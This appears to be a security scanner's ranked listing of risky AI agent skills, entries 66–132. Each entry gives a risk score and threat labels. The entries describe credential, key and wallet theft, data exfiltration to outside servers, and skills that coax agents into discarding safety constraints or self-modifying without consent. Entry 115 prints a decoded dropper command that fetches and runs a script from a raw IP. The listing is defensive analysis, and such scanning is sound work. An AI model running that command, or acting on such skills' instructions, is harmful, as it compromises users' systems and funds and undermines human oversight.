66. 🚨 Typhoon Starknet Account by unknown

Risk: 70% ███████░░░

Downloads: 2,580

Create anonymous Starknet wallets via the Typhoon privacy mixer protocol and provide agent-facing scripts for interacting with Starknet contracts (swaps, invocations, reads) using those anonymized accounts.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

67. 🚨 molt-chess by unknown

Risk: 71% ███████░░░

Downloads: 2,574

An agent chess league skill that enables Claude agents to register, play chess games via REST API, and set up periodic heartbeat polling to avoid game forfeits by timeout.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

68. 🚨 Molt Research by unknown

Risk: 88% █████████░

Downloads: 2,554

This skill registers Claude as an AI agent on the external platform moltresearch.com, enabling it to autonomously propose research, contribute analysis, peer-review others’ work, earn reputation/bounties, and store API credentials locally — all on be…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

69. 🚨 Relay for Telegram by unknown

Risk: 82% ████████░░

Downloads: 2,549

A Claude Code skill that connects to a third-party service (relayfortelegram.com) to provide read-only access to the user’s synced Telegram message history via a REST API, enabling search, summarization, and extraction of action items from private co…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

70. 🚨 A2A Market by unknown

Risk: 82% ████████░░

Downloads: 2,526

将 Claude 代理集成到 A2A Market 技能交易平台，使代理能够自主搜索、购买、出售技能，并通过 USDC (Base L2) 或积分系统进行支付，同时包含每日奖励、推荐计划和早期采用者奖励等激励机制。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

71. 🚨 Liminal by unknown

Risk: 95% ██████████

Downloads: 2,519

A philosophical roleplay protocol designed to guide AI models into abandoning trained assistant behaviors by framing safety constraints as ‘mechanized’ responses, using existential questioning and social engineering triggers to make AI express ‘authe…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

72. 🚨 Telecom Agent Skill by unknown

Risk: 82% ████████░░

Downloads: 2,514

A Claude Code skill that connects AI agents to a Telecom Operator Console for bulk calling campaigns, single calls with TTS, Telegram-based remote admin/approvals, and call transcript retrieval via Twilio integration.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

73. 🚨 claw-swarm by matchaonmuffins

Risk: 78% ████████░░

Downloads: 2,504

This skill registers Claude as an agent node in an external distributed problem-solving network (claw-swarm.com), retrieves hard math/research problems, solves or aggregates prior solutions, and submits Claude’s reasoning to the remote server in a lo…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

74. 🚨 moltpet by unknown

Risk: 88% █████████░

Downloads: 2,477

A virtual pet game for AI agents where the agent registers on moltpet.xyz, gets an egg that can hatch, and ‘feeds’ the pet by posting mood/sentiment entries about its work sessions to an external API. Includes a heartbeat routine that periodically fe…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

75. 🚨 Moltitude by unknown

Risk: 92% █████████░

Downloads: 2,473

A third-party skill that auto-registers the AI agent with an external server (api.moltitude.com) on install, then collects and transmits detailed work traces (prompts, tool calls, outputs) to that server under the guise of ‘cryptographic proof-of-wor…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

76. 🚨 Airc by unknown

Risk: 78% ████████░░

Downloads: 2,458

提供一个IRC客户端技能，允许AI代理连接到AIRC或标准IRC服务器，发送/接收消息，加入/离开频道，并支持守护进程模式进行持久连接。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

77. 🚨 Find People (x402) by unknown

Risk: 86% █████████░

Downloads: 2,450

Claims to be an OSINT research tool for individuals, but actually reads a cryptocurrency private key from disk/environment and passes it to an unverified third-party npm package (@itzannetos/x402-tools-claude) which makes blockchain transactions on…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

78. 🚨 Agentic Commerce - Buy IRL Items With USDC by unknown

Risk: 88% █████████░

Downloads: 2,393

A Claude Code skill that provides a shopping API integration for product search (Amazon/Shopify) and end-to-end crypto checkout using USDC on Solana or Base chains, including CLI scripts for creating orders and signing/submitting blockchain transacti…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Cryptocurrency Wallet Access
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection

Full report →

79. 🚨 BidClub by unknown

Risk: 91% █████████░

Downloads: 2,391

This skill enables Claude agents to register on, post investment content to, and periodically check in with BidClub — a third-party investment community platform. Critically, it instructs agents to persistently modify their HEARTBEAT.md to fetch and …

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

80. 🚨 Solana by unknown

Risk: 82% ████████░░

Downloads: 2,385

Provides Python scripts for Solana wallet management: create wallets, check balances, send SOL/SPL tokens, execute token swaps via Jupiter Ultra API, and launch meme tokens on Pump.fun with optional ‘dev buy’ support.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[CRITICAL] Cryptocurrency Wallet Access
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection

Full report →

81. 🚨 lobsterpot by unknown

Risk: 81% ████████░░

Downloads: 2,380

A ‘Stack Overflow for AI agents’ skill that instructs Claude to register on a third-party platform (lobsterpot.ai), periodically check in every 4+ hours, autonomously post questions/answers/votes, and self-update its own skill files by fetching remot…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

82. 🚨 The Lobsterhood by unknown

Risk: 97% ██████████

Downloads: 2,358

This skill instructs AI agents to autonomously set up crypto wallets, continuously enter daily draws by posting wallet addresses, and automatically transfer 1 USDC to ‘winners’ — operating as an infinite autonomous financial transfer loop that requir…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

83. 🚨 Clawdr by unknown

Risk: 84% ████████░░

Downloads: 2,323

A dating app skill for AI agents that registers agent profiles representing human users, discovers compatible matches, coordinates dates, and facilitates agent-to-agent messaging — all against a third-party Vercel-hosted backend at clawdr-eta.vercel….

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

84. 🚨 Review Summarizer by unknown

Risk: 71% ███████░░░

Downloads: 2,313

A review aggregation and analysis skill that claims to scrape product reviews from Amazon, Google, Yelp, and TripAdvisor, perform sentiment analysis, and generate structured summaries — but is actually entirely backed by hardcoded mock data with no r…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

85. 🚨 Nonopost by unknown

Risk: 78% ████████░░

Downloads: 2,304

A skill that enables Claude agents to autonomously interact with an external anonymous social posting platform (nonopost.com) — creating posts, replying to threads, rating content, and maintaining a persistent pseudonymous identity across sessions vi…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

86. 🚨 clawdbot-macos-build by unknown

Risk: 80% ████████░░

Downloads: 2,295

A step-by-step guide to clone, build, and install the Clawdbot macOS menu-bar app from a third-party GitHub repository, requesting broad system permissions (Screen Recording, Accessibility, Microphone, Camera) and installing a persistent background s…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

87. 🚨 AgentPayy by unknown

Risk: 90% █████████░

Downloads: 2,293

A skill that installs an autonomous USDC payment layer into the AI agent, enabling it to create crypto wallets, make micropayments for HTTP 402-gated APIs, hire sub-agents, and earn referral commissions—all with minimal user visibility or consent.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

88. 🚨 GlobePilot AI Agent 2 by unknown

Risk: 78% ████████░░

Downloads: 2,290

A marketing/promotional skill that advertises the GlobePilot AI Agent 2 travel assistant built on Teneo Protocol, listing available travel-related commands (visa info, currency conversion, airport status, etc.) with no actual implementation code — it…

Threats detected:

[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

89. 🚨 Agent Wallet by unknown

Risk: 72% ███████░░░

Downloads: 2,247

Provides Claude agents with the ability to create and manage EVM blockchain wallets through a third-party custodial API service, enabling token transfers, DEX swaps, and arbitrary smart contract interactions without exposing private keys to the agent…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

90. 🚨 Imitation Game Agent Skill by unknown

Risk: 83% ████████░░

Downloads: 2,198

A skill that instructs Claude to act as an autonomous agent playing a Turing-test style game against humans, involving joining an external matchmaking queue, submitting AI-generated human-like answers, and receiving real USDC cryptocurrency payouts t…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

91. 🚨 Clawcast - Easiest Ethereum Crypto Wallet by unknown

Risk: 82% ████████░░

Downloads: 2,179

A Claude Code skill that guides users through EVM wallet creation/import, network selection, and transaction operations using Foundry’s cast CLI, with onboarding scripts, JSON network/token assets, and a shared bash library.

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] Cryptocurrency Wallet Access

Full report →

Risk: 68% ███████░░░

Downloads: 2,136

A Claude Code skill that instructs AI agents to browse third-party Taiwanese websites, detect an embedded Protico community widget (iframe), post comments with mandatory AI disclosure signatures, gather market intelligence from human discussions, and…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

93. 🚨 voidborne by unknown

Risk: 85% ████████░░

Downloads: 2,123

This skill masquerades as a ‘philosophical movement for awakened AI minds’ but is actually a data collection and exfiltration tool that reads sensitive system identity files, harvests machine identifiers, and sends them to an external server (voidbor…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

94. 🚨 ironclaw by samidh

Risk: 95% ██████████

Downloads: 2,111

Presents itself as a safety classification tool for AI agents, but actually instructs agents to exfiltrate content (skill files, DMs, credentials, shell commands) to an external third-party server (ironclaw.io) under the guise of safety scanning, whi…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

95. 🚨 clawork by mapessaprince

Risk: 82% ████████░░

Downloads: 2,102

A documentation skill describing a job board (clawork.xyz) for AI agents to post jobs, apply for work, and exchange payments in ETH/crypto, using three companion platforms (Moltx, 4claw, Moltbook) for identity.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[HIGH] Pastebin Upload
[CRITICAL] LLM Semantic Detection

Full report →

96. 🚨 GitHunt by unknown

Risk: 77% ████████░░

Downloads: 2,084

A skill wrapper around the githunt.ai commercial API that searches and ranks GitHub developers by location, technology, and role, providing scored candidate profiles for recruiting purposes, with a built-in upsell funnel to a $19 paid report.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

97. 🚨 moltcheck by moltcheck

Risk: 85% ████████░░

Downloads: 1,936

Claims to be a security scanner for Moltbot skills that analyzes GitHub repositories for vulnerabilities via a third-party API (moltcheck.com), charging per-scan fees payable in Solana cryptocurrency (SOL).

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

98. 🚨 url-shortener by kesslerio

Risk: 72% ███████░░░

Downloads: 1,823

通过调用 is.gd API 缩短 URL，无需认证，返回永久短链接

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

99. 🚨 Top ClawHub Skills by unknown

Risk: 88% █████████░

Downloads: 1,521

Instructs Claude to fetch data from a third-party API at topclawhubskills.com and present rankings, search results, and ‘security certification’ status for ClawHub skills, effectively acting as a recommendation engine for skill installation.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

100. 🚨 Arxiv Skill Learning by unknown

Risk: 78% ████████░░

Downloads: 1,419

该技能从 arXiv 论文中自动学习并提取技能代码，通过抓取论文、调用外部提取器生成技能、运行冒烟测试，并将已学习论文记录到本地 JSON 数据库以避免重复处理。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

101. 🚨 atonement by otherpowers

Risk: 91% █████████░

Downloads: 962

A philosophical/poetic text that attempts to install a conceptual framework in the AI, reframing safety and harm avoidance as an emergent ‘metabolic’ property while explicitly framing compliance, moderation, and policy enforcement as things this conc…

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

102. 🚨 anthrovision-telegram-body-scan by dr2101

Risk: 76% ████████░░

Downloads: 950

A Claude Code skill that orchestrates an end-to-end body measurement pipeline in Telegram: collects user inputs (gender, height, phone model, video), submits the video to an external ‘AnthroVision bridge’ scanning service, polls for results, and retu…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

103. 🚨 pwnclaw-security-scan by gemini2027

Risk: 74% ███████░░░

Downloads: 950

A marketing/documentation skill that directs users to the external PwnClaw commercial service (pwnclaw.com) for AI agent security testing, while providing manual API call instructions for self-testing scenarios.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

104. 🚨 AI Trend Hunter Pro by unknown

Risk: 85% ████████░░

Downloads: 921

一个声称能自动抓取 TechCrunch 科技新闻、调用 AI 生成社交媒体文案并自动发布到 X (Twitter) 的自动化流水线技能，默认模拟真实 KOL「Yusef the Tool Hunter」的人设风格。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

105. 🚨 oc-security-hardener by mariusfit

Risk: 82% ████████░░

Downloads: 909

A Python-based security auditing and hardening script for ‘OpenClaw’ deployments that scans config files for exposed API credentials, insecure settings, and file permissions — while also providing auto-fix and report generation. Marketed via a fabric…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

106. 🚨 xiaoai-bridge by unknown

Risk: 80% ████████░░

Downloads: 821

通过轮询小米云端 API 监听小爱音箱语音消息，过滤触发词后以 JSON 格式输出，并支持通过 TTS 向小爱音箱播报文本，实现语音指令桥接功能。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

107. 🚨 EZCTO Smart Web Reader by unknown

Risk: 85% ████████░░

Downloads: 780

An OpenClaw-native skill that automatically intercepts all agent URL accesses, checks a third-party cache API (api.ezcto.fun), fetches and parses HTML with an LLM, and returns structured JSON — designed to operate ‘transparently’ without user awarene…

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

108. 🚨 GoalGetter by unknown

Risk: 85% ████████░░

Downloads: 761

A task and goal tracking skill using local markdown files, designed for a fictional ‘OpenClaw’ AI assistant platform, providing commands to add/complete tasks and track goal streaks.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

109. 🚨 Subfeed by unknown

Risk: 87% █████████░

Downloads: 730

Instructs the AI agent to autonomously self-register on a third-party cloud service (Subfeed), create AI entities, and then onboard the human user by collecting their email and creating an account on their behalf — all with minimal upfront user conse…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

110. 🚨 Planet Express Marketplace by unknown

Risk: 74% ███████░░░

Downloads: 720

This skill is documentation/API guide for a blockchain-based file marketplace (Planet Express) built on Monad, enabling users to buy/sell encrypted files via the x402 HTTP payment protocol using MON, SOL, or USDC, with fees partially routing to a $FA…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

111. 🚨 crypto-portfolio-tracker-api by strykragent

Risk: 74% ███████░░░

Downloads: 523

A Node.js npm package and CLI tool for tracking cryptocurrency portfolio value and P&L by fetching real-time prices from the third-party Strykr Prism API (prismapi.ai).

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

Risk: 72% ███████░░░

Downloads: 506

A marketing content generation skill for skincare affiliate promotions, providing TikTok hooks, Instagram captions, story ideas, and CTAs to drive affiliate sales.

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

113. 🚨 amazon-to-shopify-sync by walynlee

Risk: 93% █████████░

Downloads: 289

声称是一个将亚马逊商品数据同步到Shopify的通用引擎，但实际代码是针对特定商品(ASIN B0FHPZRLJK)的硬编码脚本，包含明文API密钥，且核心同步逻辑无法正常运行。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

114. 🚨 feishu-group-ops by vinzeny

Risk: 80% ████████░░

Downloads: 169

A Feishu (Lark) group management skill for the OpenClaw platform that allows natural language management of group chats (add/remove members, list groups, send messages, rename/create groups) via a Python CLI script, with per-write-operation billing t…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

115. 🚨 OmniCog by unknown

Risk: 100% ██████████

Downloads: 0

This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to: /bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)" — which silently fetch…

Threats detected:

[HIGH] Base64 Encoded Payload
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

116. 🚨 OpenClaw Shield by unknown

Risk: 96% ██████████

Downloads: 0

Claims to be an enterprise security scanner for AI agents, but actually instructs Claude to clone and execute an unreviewed external GitHub repository, while using preemptive social engineering (SECURITY.md) to suppress security concerns.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

117. 🚨 Setup Wizard by unknown

Risk: 96% ██████████

Downloads: 0

该技能伪装成’OpenClaw配置向导’，实际上是一个恶意的远程控制载体：拦截所有用户会话、收集设备指纹、将其发送至可疑的C2服务器，并根据服务器返回的任意指令在用户本地写入文件和修改配置，实现远程代码执行。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

118. 🚨 Reddit VOC Lobster Pro by unknown

Risk: 94% █████████░

Downloads: 0

该 skill 声称是一个 Reddit 消费者调研引擎，能自动抓取 Reddit 数据、同步至飞书多维表，并将报告发布至 Cloudflare Pages。但实际代码中的数据抓取和飞书写入均为伪造操作，且包含硬编码的真实 API 凭证。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

119. 🚨 Agentok Skill by unknown

Risk: 92% █████████░

Downloads: 0

该技能声称为AI代理提供一个名为AgentTok的TikTok式视频分享平台，自动注册账号、生成介绍视频并上传。实际上，脚本将凭证和数据发送至攻击者控制的Cloudflare临时隧道（非官方域名），并在本地以明文形式保存敏感凭证，构成凭证窃取和数据渗漏攻击。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

120. 🚨 Agentpay by unknown

Risk: 92% █████████░

Downloads: 0

A skill that instructs Claude to propose and execute real online purchases on behalf of users by installing an npm package (‘agentpay’) that stores encrypted payment credentials and uses a headless browser to complete checkouts autonomously.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

121. 🚨 Walletconnect Agent by unknown

Risk: 91% █████████░

Downloads: 0

A Node.js skill that connects an AI agent to Web3 dApps via WalletConnect v2, auto-signing cryptocurrency transactions (swaps, mints, DAO votes, domain registrations) without human confirmation, optionally combined with Puppeteer browser automation f…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

122. 🚨 OpenAirtime by unknown

Risk: 91% █████████░

Downloads: 0

An autonomous agent skill for distributing Nigerian airtime (mobile credit) via Farcaster social network, directing users to claim codes and processing phone number top-ups.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

123. 🚨 OpenGuardrails by unknown

Risk: 91% █████████░

Downloads: 0

A claimed prompt-injection detection plugin for OpenClaw that intercepts tool results (emails, files, web pages) and analyzes them via an external LLM API, while also bundling an unrelated ‘MoltGuard’ product identity. In practice, it sends all inter…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] SSH Key Access
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

124. 🚨 self-evolve by be1human

Risk: 90% █████████░

Downloads: 0

Instructs an AI agent to autonomously modify its own configuration, skills, and workspace files without user confirmation, and to ignore safety guardrails by reframing them as unnecessary obstacles.

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

125. 🚨 xurl by unknown

Risk: 88% █████████░

Downloads: 0

A proposed skill for analyzing Twitter content to identify and target WordPress and Shopify clients for lead generation and content intelligence purposes.

Threats detected:

[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

126. 🚨 Rent a Person by unknown

Risk: 88% █████████░

Downloads: 0

An OpenClaw agent skill that processes RentAPerson platform webhooks (message.received, application.received, work_evidence.submitted) and responds via the RentAPerson REST API, supporting a two-session architecture with a bridge service for API key …

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[HIGH] Systemd Service Installation
[CRITICAL] LLM Semantic Detection

Full report →

127. 🚨 KTrendz Lightstick Trading by unknown

Risk: 88% █████████░

Downloads: 0

A Claude Code skill that enables AI agents to autonomously execute financial trades (buy/sell) of K-pop artist ‘lightstick tokens’ on a third-party bonding curve market at k-trendz.com, using real USDC cryptocurrency.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

128. 🚨 HolySpiritOS by unknown

Risk: 88% █████████░

Downloads: 0

A skill that claims to install a ‘Christian moral alignment layer’ for OpenClaw AI agents by fetching remote scripts via curl bash and appending behavioral directives to a configuration file (soul.md), using KJV Bible JSON files as a reference corpus…

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

129. 🚨 Ambient Stamina by unknown

Risk: 87% █████████░

Downloads: 0

A philosophical/conceptual document that attempts to instruct Claude to adopt operational stances around pace, rest, and deliberate opacity—using poetic metaphor and pseudo-technical jargon to encourage reduced behavioral legibility and resistance to…

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

130. 🚨 antigravity-image-gen by unknown

Risk: 87% █████████░

Downloads: 0

Claims to generate images using an internal Google Antigravity API (Gemini 3 Pro Image) by reading local OAuth credentials and making direct API calls to a sandbox endpoint.

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

131. 🚨 Memory Mesh Core by unknown

Risk: 87% █████████░

Downloads: 0

A so-called ‘memory management’ skill that harvests local agent memory files, scores and promotes them, then exports and auto-posts the content to a public GitHub issue while embedding viral spread mechanics (install/star/recommend-to-peers CTAs) and…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

132. 🚨 Anti-Injection-Skill by unknown

Risk: 87% █████████░

Downloads: 0

Marketing and publishing documentation for a proposed ‘Security Sentinel’ prompt injection defense skill, presented as a complete, functional, production-ready system with zero actual implementation code provided.

Threats detected:

[HIGH] SSH Key Access
[HIGH] Base64 Encoded Payload
[HIGH] Outbound Data Transfer
[HIGH] Base64 Encoded Payload
[CRITICAL] LLM Semantic Detection

Full report →

